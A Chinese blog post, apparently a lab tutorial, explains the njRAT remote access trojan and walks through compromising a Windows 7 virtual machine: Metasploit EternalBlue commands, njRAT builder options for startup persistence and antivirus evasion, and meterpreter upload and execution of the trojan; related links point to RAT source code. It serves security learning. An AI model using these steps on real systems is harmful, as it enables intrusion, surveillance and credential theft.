njRAT 简单使用案例

最新推荐文章于 2024-08-31 08:53:20 发布
最新推荐文章于 2024-08-31 08:53:20 发布
阅读量3.1k 收藏 12
点赞数 5
分类专栏: 病毒木马 安全 文章标签: njRAT 远程访问木马 Metasploit 靶机 命令与控制
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Myu_wzy/article/details/121557771
版权

 

目录

一、njRAT 介绍

二、实验案例

1. 实验环境

2. 实验过程

(1)获取临时权限

(2)使用 njRAT 生成远控程序

(3)使用 Kali 上传该远控程序到靶机

(4)远程运行该远控程序

(5)靶机在服务端上线,成功远控靶机

三、参考资料

一、njRAT 介绍

    njRAT,也称为Bladabindi,[1]是一种远程访问工具(RAT) 或木马,它允许程序的持有者控制最终用户的计算机。它于 2013 年 6 月首次被发现,其中一些变体可追溯到 2012 年 11 月。它是由来自不同国家的名为 Sparclyheason 的黑客组织制作的,经常用于攻击中东的目标。它可以通过网络钓鱼和受感染的驱动器传播。
    RedPacket Security 将 NJRat 描述为“远程访问木马 (RAT) 具有记录击键、访问受害者的相机、窃取浏览器中存储的凭据、打开反向外壳、上传/下载文件、查看受害者的桌面、执行进程、文件、和注册表操作,以及让攻击者更新、卸载、重启、关闭、断开 RAT 并重命名其活动 ID 的能力。通过命令与控制 (CnC) 服务器软件,攻击者有能力创建和配置恶意软件以进行传播通过 USB 驱动器。”
    特点:
        操作文件
        打开远程shell,允许攻击者使用命令行
        打开进程管理器以杀死进程
        操作系统注册表
        记录电脑的摄像头和麦克风
        记录击键
        窃取存储在 Web 浏览器或其他应用程序中的密码

二、实验案例

1. 实验环境

  • 攻击机:win7-Ultime 192.168.20.149、Kali Linux 2021 190.168.20.148
  • 靶机:Win7-x64 192.168.20.130

2. 实验过程

(1)获取临时权限

        使用 Metasploit 中的 exploit 进行渗透测试,获取临时权限,进入 meterpreter 环境

msfconsole 
use exploit/windows/smb/ms17_010_eternalblue
set rhosts 192.168.20.130
exploit

(2)使用 njRAT 生成远控程序

        设置监听端口

        使用 builder 模块创建一个远控程序

 

Host:hacker 的电脑 ip

ExeName:进程名称

Directory:所在目录

Protect Process:保护进程,防止被杀软清除

Copy To StartUp:开机启动

Registy StartUp:注册表启动

(3)使用 Kali 上传该远控程序到靶机

meterpreter > upload /home/kali/Desktop/Client.exe c:\\Client.exe

(4)远程运行该远控程序

meterpreter > shell  # 获取反弹 shell

C:\Windows\system32>cd c://  # 切换到远控软件所在的目录

c:\>Client.exe  # 执行远控软件

(5)靶机在服务端上线,成功远控靶机

        此时已成功控制靶机,可以使用 njRAT 对靶机进行下一步操作,如文件管理、远程桌面、麦克风、运行脚本、发起对话等操作。

三、参考资料

对njrat的初步了解 远控实验及流量分析_m0_46377671的博客-CSDN博客

 

本文章仅作技术学习作用,一切实验皆在个人虚拟环境下进行!

服务器被肉鸡如何解决?
qq_780662763的博客
08-19 1813
服务器被肉鸡是指开了3389端口微软终端服务(microsoftterminalservice),又有弱密码的高速服务器,俗称“肉鸡”。如果我们的服务器被肉鸡了怎么办呢?如何处理呢?下面我们就来详细的介绍下服务器被肉鸡的解决方法: 一、立即执行 1、更改系统管理员账户的密码,密码长度不小于8位并且使用大写字母/小写字母/数字/特殊字符组合; 2、更改远程登录端口并开启防火墙限制允许登录的IP,防火墙配置只开放特定的服务端口并对FTP、数据库等这些不需要对所有用户开放的服务进行源IP访问控制; 3、检查是否.
njrat的初步了解 远控实验及流量分析
m0_46377671的博客
07-11 7077
有不对的地方请指正 1.njart介绍 njRAT,也称为Bladabindi,[1]是一种远程访问工具(RAT) 或木马,它允许程序的持有者控制最终用户的计算机。它于 2013 年 6 月首次被发现,其中一些变体可追溯到 2012 年 11 月。它是由来自不同国家的名为 Sparclyheason 的黑客组织制作的,经常用于攻击中东的目标。它可以通过网络钓鱼和受感染的驱动器传播。 RedPacket Security 将 NJRat 描述为“远程访问木马 (RAT) 具有记录击键、访问受害者的相机、窃
Njrat免杀实例2
04-23
Njrat免杀实例2
njRAT v0.7d 远程控制软件
04-08
njRAT v0.7d 远程控制软件。 远程控制软件,最著名远控软件,njRAT v0.7d 远程控制软件,最著名远控软件,njRAT v0.7d 远程控制
网络安全之史上最全的njRAT通信协议分析
WSN_IPv6的博客
04-07 2844
网址:http://www.freebuf.com/articles/network/122244.html
什么是NjRAT
m0_57836225的博客
08-23 444
每天15篇占位。
njRAT 开源项目安装与使用指南
最新发布
gitblog_00645的博客
08-31 580
njRAT 开源项目安装与使用指南 项目地址:https://gitcode.com/gh_mirrors/njr/njRAT 1. 项目目录结构及介绍 欢迎使用njRAT,一个基于Visual Basic .NET编写的远程管理工具(RAT)。请注意,由于njRAT的性质可能涉及网络安全风险,使用此类工具应遵循合法合规的原则。 以下是njRAT项目的基本目录结构示例及各部分简介: ├── src...
njrat的研究
jd16manson的博客
05-17 834
http://www.freebuf.com/articles/network/122244.html
Nj-Rat + Babel.rar_nj rat_njrat_rat_remote
09-23
【压缩包子文件的文件名称列表】中的 "Nj-Rat + Bable.exe" 很可能是NJ-RAT的载体文件,"Bable" 可能是攻击者为了混淆视听而使用的名称,试图让这个恶意程序看起来像是一个普通的可执行文件。一旦运行,这个.exe文件...
RAT-NjRat-0.7d-modded-source-code:新泽西州-Source code
03-25
RAT-NjRat-0.7d-调制源代码 仅用于教育目的 改装:- -插槽分割键-Display Client安装了防病毒软件-更新了GeoIP.dat -Anti // Sandboxie VMware Wireshark VirtualBox ProcessHacker ApateDNS ProcessExplorer -传播...
njRAT远程访问木马协议分析
kevin_bobolkevin的博客
11-30 8836
第一节    简介 njRAT在2013年第一次出现,主要盛行于中东地区,在世界其他国家和地区也有广泛传播。njRAT 程序完美支持阿拉伯字符,有证据表明极端组织ISIS使用njRAT作为重要的网络武器。njRAT使用微软的 .NET框架开发,并像其他许多木马一样为远程攻击者提供了对被感 染系统的完全控制功能。我们已经看到攻击者利用被污染的流行游戏、破解软件及注册机来进行污染传播。njRAT木马
网络安全njRAT远控工具及下载
weixin_74245209的博客
08-27 1894
剩下的不说了值得一提:这个程序是rookit病毒很强力直接到内核杀毒软件在其运行之前可查杀,但在成功双击之后很难再次清除。受害者的设备,记录击键、访问摄像头、窃取浏览器中存储的凭据、上传/下载文件、操作注册表等。1.在一开始,我们要先将木马主程序,控制端安装在有公网地址(注意:一定保证外网可以访问)远控在渗透实战中的维权操作相当重要,今天为大家介绍一款工具:njrat。2.点击下面的builder并在红圈处输入自己的外网地址和开放端口。,可以下发相应的指令触发恶意软件的功能,也能获取目标的各种数据。
警惕:新型蠕虫病毒通过可移动驱动器传播,并安装BLADABINDI后门
weixin_34256074的博客
11-30 1501
BLADABINDI,也被称为njRAT或Njw0rm,是一种远程访问***(RAT),具有众多后门功能——从键盘记录到执行分布式拒绝服务(DDoS)。自首次出现以来,该***就已经在各种网络间谍活动中被重新编译和使用。事实上,BLADABINDI的可定制性以及可以在暗网地下黑市购买到的特性使得它成为一个广泛存在的威胁。举个例子:在上周,趋势科技就遇到了一种蠕虫病毒(由趋势科...
拍拍熊(APT-C-37),诱导方式、DNS、安卓远控
weixin_30270889的博客
04-10 437
诱导方式 1、含有正常APP功能的伪装 2、文件图标伪装 RAR 1、Android DroidJack SpyNote Windows njRAT njRAT[2]又称Bladabindi,通过控制端可以操作受控端的注册表,进程,文件等,还可以对被控端的键盘进行记录。同时njRAT采用了插件机制,可以通过不同的插件来扩展njRAT的功能。 该组织在使用njRAT时大多不是直接使用,...
adobe reader 自动关闭_威胁情报 | Microsoft & Adobe超过140个漏洞进行了更新
weixin_39634351的博客
11-30 295
2月份的”周二补丁日“ 带来了微软和Adobe的一系列更新,每个更新都发布了影响其各自产品的70多个漏洞的更新。 是的,没错,总共超过140个漏洞。Microsoft发布了77个CVE补丁以及三个建议,影响了其产品组合中广泛部署的产品,包括Internet Explorer,Edge,Exchange Sever,Windows,Office,.Net Framework等。从优先级考虑...
微软恶意软件删除工具获更新
weixin_34250434的博客
07-03 365
微软的恶意软件删除工具在本周二获得了更新,增加了对Bladabindi, Gamarue, Sality, Kelihos, 和Diplugem家族恶意软件的查杀功能。这些恶意软件包含窃取敏感个人信息,为黑客提供PC控制权,删除安全相关文件,传播垃圾邮件,浏览器恶意广告 弹出等恶意行为。 微软的恶意软件删除工具会检查运行Windows系统的计算机是否被...
远控杂说---总有一款适合你
小英雄颂人头
03-28 2366
前言 我在佛前苦求了几千年神器,愿意用几世换我们一世情缘,希望可以感动上天。 你我相识,我们一同探索开源神器,如果喜欢小编,就赶紧关注我们, 让我们一起成长吧 部分图片 下面的图片展示了一部分远控的图片,里面包含了很多很多好玩有不错的事情。 远控大集合列表 优秀神器大杂烩 https://github.com/quasar/QuasarRAT https://github.co...
远控(RAT)软件汇总
a807719447的专栏
10-10 6005
如题,甩一堆源码给你自己去编译就没有后门了 https://github.com/quasar/QuasarRAT https://github.com/TheSph1nx/RT-101 https://github.com/BlackHacker511/BlackRAT https://github.com/mwsrc/njRAT https://github.com/Jwsoat-Media/...
多年来这伙黑客都在通过木马化黑客工具攻击另一伙黑客
smellycat000的专栏
03-10 456
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士团队多年来,一个神秘团伙几乎每天都会推出多款木马化的黑客工具,感染黑客并获得访问其计算机的权限。网络安全企业 Cybereason...
新泽西州RAT-NjRat-0.7d-调制源代码深度分析
关于NjRat这类恶意软件,用户应该始终保持警惕,并确保自己的计算机系统处于最新的安全更新下,使用有效的安全软件和反病毒解决方案,避免下载不明来源的文件,并且不要随意插拔外部存储设备。IT行业工作者在面对...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值